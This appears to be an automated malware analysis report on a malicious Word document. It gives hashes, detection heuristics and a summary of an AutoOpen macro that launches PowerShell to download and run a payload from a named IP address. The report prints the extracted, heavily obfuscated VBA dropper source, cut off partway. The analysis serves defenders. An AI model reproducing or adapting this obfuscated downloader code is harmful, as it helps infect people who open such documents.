Office (OLE) malware analysis — malicious · 944d17327fccc100

MALICIOUS

Office (OLE)

117.8 KB Created: 2018-06-19 19:38:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: 1559f2bc0ac9b35a57e02c18b908126d SHA-1: 9e9745a07692898871b16f571b6e0226c321391c SHA-256: 944d17327fccc100b9169fa18f1522aa6407e354e437beabe33d52715a37585f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen function triggers the execution of a Shell command. This command constructs and executes a PowerShell command that downloads a payload from 'http://185.143.223.174/payload.exe' and executes it. This indicates a downloader or dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6584888-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6584888-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15127 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15127 bytes
SHA-256: `e6ee61016c71cc733d04cad4216f275a65e606d8787745ca33763c44f9c1e9e6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AouiwtSpf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "lijbaJnZ" Function rpLANBUlZ() On Error Resume Next BzSPUM = 49353 WfFFrn = kFBmPU NzMahG = CDate(kuDnQZ + Sin(88118 + 5063) * 75463 * CInt(10236)) QipucK = 73371 rpkTG = CByte(TMNKAL) ANDut = CDate(93208) VdwNdzN = "OwerSHe" + "ll &((vARIA" + "bLe 'MDr" + "'" + ").NaME[3,11,2]" + "-JOiN''" + ") ( [st" + "RiNG]::JOIN(" BjSJX = 68740 Dwwho = ipzHl EIKuEW = CDate(WnhQOw + Sin(55649 + 6761) * 24172 * CInt(34377)) aLjuYp = 30132 czazEW = CByte(lHGYc) BuzijM = CDate(158) FkILuSKpK = "'' , (( 6" + "0, 124" + ",115," + "108,79" zAnOU = 46895 RAaICi = BUJrki GFiEEO = CDate(OQDLhN + Sin(30147 + 92699) * 39076 * CInt(84386)) dURCj = 87509 OzYqk = CByte(SIBuW) GLOWV = CDate(71163) SOJPqLUJJM = ",80 , 79 , 56" + " , 37 " + ",56 , 118 , 125" + " , 111 " cnwBF = 81024 zOiOtu = AooQj Dswtkw = CDate(oMbGw + Sin(85364 + 74101) * 84612 * CInt(31275)) bVjzJ = 32591 JEJrW = CByte(EkZwCv) DtnXf = CDate(47966) fktIQkdEF = ",53 , 11" + "9, 122, " + "114 ,125,123,10" + "8 ,56 " + ", " QHYoP = 44868 NDDqT = TbXKOw QudbJj = CDate(puzWwa + Sin(88365 + 70288) * 43341 * CInt(10024)) LzHqI = 78414 rGDSLc = CByte(XRqiKz) twJrFM = CDate(1190) pZSPo = "106 ,121, " + "118, 124" + " , 119 ," + " 117 ,35," TEfcwf = 76537 wbKJM = aQhKc wTDbh = CDate(nIYbt + Sin(76930 + 21342) * 33851 * CInt(43464)) szBwpc = 4660 EzLnm = CByte(zzjZbi) iLhaz = CDate(80187) iKkDOGCidZs = " 60, 77" + ",73, 1" + "13," + " 113 ," + " 85 , 56,37" + ",56, 118,125, 1" vjFRMq = 48609 YEOCLJ = DqHphX vwiPlc = CDate(WtzVa + Sin(40041 + 69359) * 87415 * CInt(82249)) Zwikp = 70935 jnTqM = CByte(iznfzw) nuXtCQ = CDate(50791) OiQhtUsnM = "11 ,5" + "3 ,119,1" + "22 , 114" + ", 125 ,123 ," + "108 ,56" + " ,75 ,97 ,1" + "07, 108 ,125,1" aLUcti = 56623 QfOnG = AfPiq cpzEFK = CDate(tuZRaz + Sin(61378 + 34230) * 7410 * CInt(76291)) nYvhvj = 8315 ZDBjH = CByte(LLYkoF) vVZoV = CDate(75020) BlBtVr = "17 , 5" + "4 , 86,12" + "5 , 108 , 54" + ", 79, 125, " + "122 ," rpLANBUlZ = VdwNdzN + FkILuSKpK + SOJPqLUJJM + fktIQkdEF + pZSPo + iKkDOGCidZs + OiQhtUsnM + BlBtVr End Function Function JBUApuJiu() On Error Resume Next azfSQw = 35829 IASoz = zFtAC iSkizq = CDate(TAvWIh + Sin(73218 + 50390) * 69578 * CInt(3045)) PQMZj = 75188 FfdRm = CByte(FHhojw) auTDA = CDate(72636) zKKkwGcHAr = "91, 116, 1" + "13 , 12" + "5,118, 108,35" + " , 6" + "0, 93,76,95, 11" + "7, 10" + "4, 7" + "8 ,56,3" uRvNmG = 73649 AsulYb = tURLXz jFvICn = CDate(GHMmjh + Sin(25769 + 77015) * 48366 * CInt(77794)) VTGMiI = 29361 aQSAK = CByte(islaq) diuzZ = CDate(31415) DFQhkD = "7, 56, 6" + "3 , 1" + "12,108, 108," + "104 , 3" + "4,55 ,55 ,11" + "9 , 1" + "18" + " , 108,10" + "6 ,121 ," + " 12" VKWfw = 87919 BRbOza = fJwFu KOHbuj = CDate(nWkOs + Sin(54923 + 10031) * 71254 * CInt(29332)) PnQzit = 96050 FpJFW = CByte(XsuhU) JSXvj = CDate(28251) dthanjmwMhv = "3,115" + ", 107, 1" + "19, 116 ,109, " + "108 ,11" PZKlB = 16715 VVdPW = BSisE cWrRNm = CDate(QdwSiq + Sin(33833 + 89102) * 64231 * CInt(82608)) coFNPi = 63898 osEYDu = CByte(RnjMnw) khFtYU = CDate(52533) bRvPOdIKXY = "3 " + ", 119 , 118, " + "107 ,54" + " ,123 ,11" jGZWGQ = 41565 jpIpz = ChwWl ZdCMAE = CDate(PvHJF + Sin(70414 + 69887) * 25910 * CInt(22857)) ZKUwrs = 54205 FSmYC = CByte(wGzNA) PvHALl = CDate(38500) SNqbL = "9 ,117 ,5" + "5 , 47, 46, " + "47, 93 , 1" + "27," + "113, 11" + "2 , 55, 8" + "8 , 11" + "2,108, " aYzzj = 19683 DifZk = ROQwU oJsslv = CDate(HsKFoY + Sin(96776 + 76418) * 92171 * CInt(83609)) MTnuP = 69819 DuAfhv = CByte(fvLoaN) iDilP = CDate(42999) QCXStUCiQ = "108 ,104 ,34 ," + "55" + " ,55 ,111,11" + "1 , 1" mwAQX = 6058 ZOGMYi = wiAKR dwmBdi = CDate(oEHCO + Sin(15333 + 42636) * 66710 * CInt(39691)) ZWijZ = 6354 iloBq = CByte(qhMrQ) ZpaWi = CDate(65484 ... (truncated)

SHA-256: e6ee61016c71cc733d04cad4216f275a65e606d8787745ca33763c44f9c1e9e6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AouiwtSpf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lijbaJnZ"
Function rpLANBUlZ()
On Error Resume Next
BzSPUM = 49353
WfFFrn = kFBmPU
NzMahG = CDate(kuDnQZ + Sin(88118 + 5063) * 75463 * CInt(10236))
QipucK = 73371
rpkTG = CByte(TMNKAL)
ANDut = CDate(93208)
VdwNdzN = "OwerSHe" + "ll  &((vARIA" + "bLe '*MDr" + "*'" + ").NaME[3,11,2]" + "-JOiN''" + ") ( [st" + "RiNG]::JOIN("
BjSJX = 68740
Dwwho = ipzHl
EIKuEW = CDate(WnhQOw + Sin(55649 + 6761) * 24172 * CInt(34377))
aLjuYp = 30132
czazEW = CByte(lHGYc)
BuzijM = CDate(158)
FkILuSKpK = "'' , (( 6" + "0, 124" + ",115," + "108,79"
zAnOU = 46895
RAaICi = BUJrki
GFiEEO = CDate(OQDLhN + Sin(30147 + 92699) * 39076 * CInt(84386))
dURCj = 87509
OzYqk = CByte(SIBuW)
GLOWV = CDate(71163)
SOJPqLUJJM = ",80 , 79 , 56" + " , 37 " + ",56 , 118 , 125" + " , 111 "
cnwBF = 81024
zOiOtu = AooQj
Dswtkw = CDate(oMbGw + Sin(85364 + 74101) * 84612 * CInt(31275))
bVjzJ = 32591
JEJrW = CByte(EkZwCv)
DtnXf = CDate(47966)
fktIQkdEF = ",53 , 11" + "9, 122, " + "114 ,125,123,10" + "8 ,56 " + ", "
QHYoP = 44868
NDDqT = TbXKOw
QudbJj = CDate(puzWwa + Sin(88365 + 70288) * 43341 * CInt(10024))
LzHqI = 78414
rGDSLc = CByte(XRqiKz)
twJrFM = CDate(1190)
pZSPo = "106 ,121, " + "118, 124" + " , 119 ," + " 117 ,35,"
TEfcwf = 76537
wbKJM = aQhKc
wTDbh = CDate(nIYbt + Sin(76930 + 21342) * 33851 * CInt(43464))
szBwpc = 4660
EzLnm = CByte(zzjZbi)
iLhaz = CDate(80187)
iKkDOGCidZs = " 60, 77" + ",73, 1" + "13," + " 113 ," + " 85 , 56,37" + ",56, 118,125, 1"
vjFRMq = 48609
YEOCLJ = DqHphX
vwiPlc = CDate(WtzVa + Sin(40041 + 69359) * 87415 * CInt(82249))
Zwikp = 70935
jnTqM = CByte(iznfzw)
nuXtCQ = CDate(50791)
OiQhtUsnM = "11 ,5" + "3 ,119,1" + "22 , 114" + ", 125 ,123 ," + "108 ,56" + " ,75 ,97 ,1" + "07, 108 ,125,1"
aLUcti = 56623
QfOnG = AfPiq
cpzEFK = CDate(tuZRaz + Sin(61378 + 34230) * 7410 * CInt(76291))
nYvhvj = 8315
ZDBjH = CByte(LLYkoF)
vVZoV = CDate(75020)
BlBtVr = "17 , 5" + "4 , 86,12" + "5 , 108 , 54" + ", 79, 125, " + "122 ,"
rpLANBUlZ = VdwNdzN + FkILuSKpK + SOJPqLUJJM + fktIQkdEF + pZSPo + iKkDOGCidZs + OiQhtUsnM + BlBtVr
End Function
Function JBUApuJiu()
On Error Resume Next
azfSQw = 35829
IASoz = zFtAC
iSkizq = CDate(TAvWIh + Sin(73218 + 50390) * 69578 * CInt(3045))
PQMZj = 75188
FfdRm = CByte(FHhojw)
auTDA = CDate(72636)
zKKkwGcHAr = "91, 116, 1" + "13 , 12" + "5,118, 108,35" + " , 6" + "0, 93,76,95, 11" + "7, 10" + "4, 7" + "8 ,56,3"
uRvNmG = 73649
AsulYb = tURLXz
jFvICn = CDate(GHMmjh + Sin(25769 + 77015) * 48366 * CInt(77794))
VTGMiI = 29361
aQSAK = CByte(islaq)
diuzZ = CDate(31415)
DFQhkD = "7, 56, 6" + "3 , 1" + "12,108, 108," + "104 , 3" + "4,55 ,55 ,11" + "9 , 1" + "18" + " , 108,10" + "6 ,121 ," + " 12"
VKWfw = 87919
BRbOza = fJwFu
KOHbuj = CDate(nWkOs + Sin(54923 + 10031) * 71254 * CInt(29332))
PnQzit = 96050
FpJFW = CByte(XsuhU)
JSXvj = CDate(28251)
dthanjmwMhv = "3,115" + ", 107, 1" + "19, 116 ,109, " + "108 ,11"
PZKlB = 16715
VVdPW = BSisE
cWrRNm = CDate(QdwSiq + Sin(33833 + 89102) * 64231 * CInt(82608))
coFNPi = 63898
osEYDu = CByte(RnjMnw)
khFtYU = CDate(52533)
bRvPOdIKXY = "3 " + ", 119 , 118, " + "107 ,54" + " ,123 ,11"
jGZWGQ = 41565
jpIpz = ChwWl
ZdCMAE = CDate(PvHJF + Sin(70414 + 69887) * 25910 * CInt(22857))
ZKUwrs = 54205
FSmYC = CByte(wGzNA)
PvHALl = CDate(38500)
SNqbL = "9 ,117 ,5" + "5 , 47, 46, " + "47, 93 , 1" + "27," + "113, 11" + "2 , 55, 8" + "8 , 11" + "2,108, "
aYzzj = 19683
DifZk = ROQwU
oJsslv = CDate(HsKFoY + Sin(96776 + 76418) * 92171 * CInt(83609))
MTnuP = 69819
DuAfhv = CByte(fvLoaN)
iDilP = CDate(42999)
QCXStUCiQ = "108 ,104 ,34 ," + "55" + " ,55 ,111,11" + "1 , 1"
mwAQX = 6058
ZOGMYi = wiAKR
dwmBdi = CDate(oEHCO + Sin(15333 + 42636) * 66710 * CInt(39691))
ZWijZ = 6354
iloBq = CByte(qhMrQ)
ZpaWi = CDate(65484
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.